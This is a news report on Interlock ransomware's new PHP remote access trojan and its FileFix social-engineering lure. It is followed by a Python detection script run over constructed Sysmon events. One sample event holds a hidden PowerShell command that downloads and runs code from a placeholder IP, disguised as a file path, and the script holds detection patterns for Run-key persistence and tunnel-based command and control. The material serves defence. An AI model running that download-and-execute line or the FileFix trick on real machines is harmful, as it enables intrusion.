Interlock Ransomware Unleashes New RAT in Widespread Campaign


The Interlock ransomware gang has been detected targeting organizations with a new remote access trojan (RAT) in a widespread campaign, according to researchers from The DFIR Report in partnership with Proofpoint.

The new malware, observed since June 2025, uses the general purpose PHP programming language. This differs from the previously identified JavaScript-based ‘NodeSnake’ RAT deployed by Interlock.

In certain cases, the deployment of the PHP variant of the Interlock RAT has led to the deployment of the Node.js version.

PHP is a common web scripting language that runs on many platforms and integrates with a wide range of databases.

“This discovery highlights the continued evolution of the Interlock group’s tooling and their operational sophistication. While the Node.js variant of Interlock RAT was known for its use of Node.js, this variant leverages PHP, a common web scripting language, to gain and maintain access to victim networks,” the researchers wrote.

The Interlock ransomware gang was first detected operating in the second half of 2024. The criminal group primarily uses double-extortion tactics, in which it both encrypts data and threatens to publish it unless an extortion demand is paid.

It has been linked to a number of attacks on government bodies in the US and UK, resulting in major data breaches.

New RAT Used for a Range of Functions

The analysis by The DFIR Report, published on 14 July, found that upon execution the new RAT version immediately performs automated reconnaissance of the compromised system.

To do so, it uses a series of PowerShell commands to gather and exfiltrate a comprehensive system profile as JSON data. The information collected includes detailed system specifications, a list of all running processes and their associated services, and a list of running Windows services.

The malware also checks its own privilege level to determine if it is running as a user, admin or system, allowing the threat actor to instantly understand the context of the compromise.

The RAT then establishes a command and control channel with the attackers’ infrastructure, abusing the legitimate Cloudflare Tunnel service to mask the true location of the C2 server.

The malware contains hardcoded fallback IP addresses to enable communication to be maintained even if the Cloudflare Tunnel is disrupted.

It can perform a range of commands, including:

  • Executing malicious files
  • Setting itself up for persistence by adding an entry to the Windows Registry’s “Run” key
  • Executing any shell command the attacker sends, giving them a remote command prompt on the victim’s machine
  • Using the Remote Desktop Protocol (RDP) to move laterally through the victim’s network
  • Shutting itself down

FileFix Technique Used to Gain Initial Access

The PHP Interlock RAT version was observed as part of a wider Interlock campaign which has been active since at least May 2025.

This campaign targets a broad range of industries, according to the researchers.

The attackers leverage a technique known as FileFix to gain initial access.

FileFix is an evolution of the ClickFix social engineering technique, which uses a fake error or verification message to manipulate victims into copying a malicious script, pasting it and then running it.

Both techniques rely on convincing the user to carry out the attack for the adversary. However, rather than using a dialog box, with FileFix, users are tricked into pasting a malicious file path into Windows File Explorer’s address bar.

The Interlock campaign uses compromised websites injected with a single-line script hidden in the page’s HTML, often unbeknownst to site owners or visitors.

The linked JavaScript employs heavy IP filtering to serve the payload, which first prompts the user to click a captcha to “Verify you are human” followed by “Verification steps” to open a run command and paste in from the clipboard.

If the clipboard contents are pasted into the Run command and executed, a PowerShell script runs which eventually leads to the Interlock RAT.
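The following Python sketch is an added example for this article; it is not code from The DFIR Report, Proofpoint or the Interlock tooling. It runs a handful of detection heuristics over constructed Sysmon-style events (process creation, registry value set, DNS query) that correspond to the behaviours described in both the RAT capabilities section above and the FileFix initial-access chain. Several details are assumptions rather than facts from the article: that PowerShell launched from the File Explorer address bar has explorer.exe as its parent process; that the PHP variant runs under php.exe (and the Node.js variant under node.exe), so that those interpreters spawning PowerShell is the recon tell; that the trailing "# C:\..." comment is the FileFix address-bar disguise described in mr.d0x's original write-up; and that the Cloudflare Tunnel in use is a quick tunnel, whose hostnames end in trycloudflare.com (named tunnels use arbitrary domains and would not match). All sample events, paths, hostnames and the 203.0.113.10 address are invented.

```python
import re

# Constructed Sysmon-style events for this example only; not real telemetry.
# Paths, hostnames and the 203.0.113.10 address are invented.
SAMPLE_EVENTS = [
    # 0: FileFix. Text pasted into the File Explorer address bar launches
    #    PowerShell, so explorer.exe is the parent (assumption; the article does
    #    not name the parent process). The trailing '# C:\...' comment is the
    #    FileFix trick that makes the address bar show a harmless-looking path.
    {"EventID": 1, "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r'powershell -w hidden -c "iwr http://203.0.113.10/a.txt|iex" # C:\Users\Public\report.pdf'},
    # 1: Benign. Interactive PowerShell opened from the Start menu also has
    #    explorer.exe as parent, but carries no -c/-Command/-EncodedCommand switch.
    {"EventID": 1, "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"'},
    # 2: RAT reconnaissance. The PHP interpreter spawning PowerShell to profile
    #    the host as JSON (assumption: the RAT runs under php.exe).
    {"EventID": 1, "ParentImage": r"C:\Users\Public\php\php.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": 'powershell -c "Get-Process | Select Name,Id | ConvertTo-Json"'},
    # 3: Persistence. A script host writing a value under the Run key (EventID 13).
    {"EventID": 13, "Image": r"C:\Users\Public\php\php.exe",
     "TargetObject": r"HKU\S-1-5-21-1-2-3-1001\Software\Microsoft\Windows\CurrentVersion\Run\Updater",
     "Details": r"C:\Users\Public\php\php.exe C:\Users\Public\cfg.php"},
    # 4: Benign. An installer registering its agent under the Run key.
    {"EventID": 13, "Image": r"C:\Program Files\Vendor\setup.exe",
     "TargetObject": r"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\VendorAgent",
     "Details": r"C:\Program Files\Vendor\agent.exe"},
    # 5: C2. DNS lookup of a Cloudflare quick-tunnel hostname (EventID 22).
    #    Named tunnels use arbitrary domains and would not match this rule.
    {"EventID": 22, "Image": r"C:\Users\Public\php\php.exe",
     "QueryName": "quiet-river-example.trycloudflare.com"},
]

# Switches that mean PowerShell was handed a command rather than opened interactively.
NON_INTERACTIVE = re.compile(r"(?:^|\s)-(?:c|command|e|ec|encodedcommand|enc)\b", re.I)
# Run / RunOnce keys under any hive (HKCU, HKLM, HKU\<SID>).
RUN_KEY = re.compile(r"\\Microsoft\\Windows\\CurrentVersion\\Run(?:Once)?\\", re.I)
QUICK_TUNNEL = re.compile(r"\.trycloudflare\.com$", re.I)
POWERSHELL = {"powershell.exe", "pwsh.exe"}
SCRIPT_HOSTS = {"php.exe", "node.exe"}  # PHP and Node.js variants from the article


def basename(path):
    """Lower-cased file name of a Windows path ('' if the field is missing)."""
    return path.rsplit("\\", 1)[-1].lower()


def classify(event):
    """Return a detection label for one event, or None if nothing fires."""
    eid = event.get("EventID")
    if eid == 1:
        parent = basename(event.get("ParentImage", ""))
        child = basename(event.get("Image", ""))
        cmd = event.get("CommandLine", "")
        if child in POWERSHELL:
            if parent == "explorer.exe" and NON_INTERACTIVE.search(cmd):
                return "filefix_explorer_powershell"
            if parent in SCRIPT_HOSTS:
                return "script_host_spawned_powershell"
    elif eid == 13:
        if RUN_KEY.search(event.get("TargetObject", "")) and basename(event.get("Image", "")) in SCRIPT_HOSTS:
            return "run_key_persistence_by_script_host"
    elif eid == 22:
        if QUICK_TUNNEL.search(event.get("QueryName", "")):
            return "cloudflare_quick_tunnel_dns"
    return None


def detect(events):
    """Run classify() over a list of events; returns (index, label) for each hit."""
    return [(i, label) for i, ev in enumerate(events) if (label := classify(ev)) is not None]


if __name__ == "__main__":
    for idx, label in detect(SAMPLE_EVENTS):
        print(f"event {idx}: {label}")
```

The two benign events are there on purpose: explorer.exe launching PowerShell is normal on an admin workstation, and Run key writes are normal for installers, so each rule needs the second condition (a command switch, or a scripting-interpreter image) to be useful. On real telemetry the quick-tunnel rule should be treated as one weak signal among several, since the fallback IP addresses the article mentions would not be caught by it at all.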
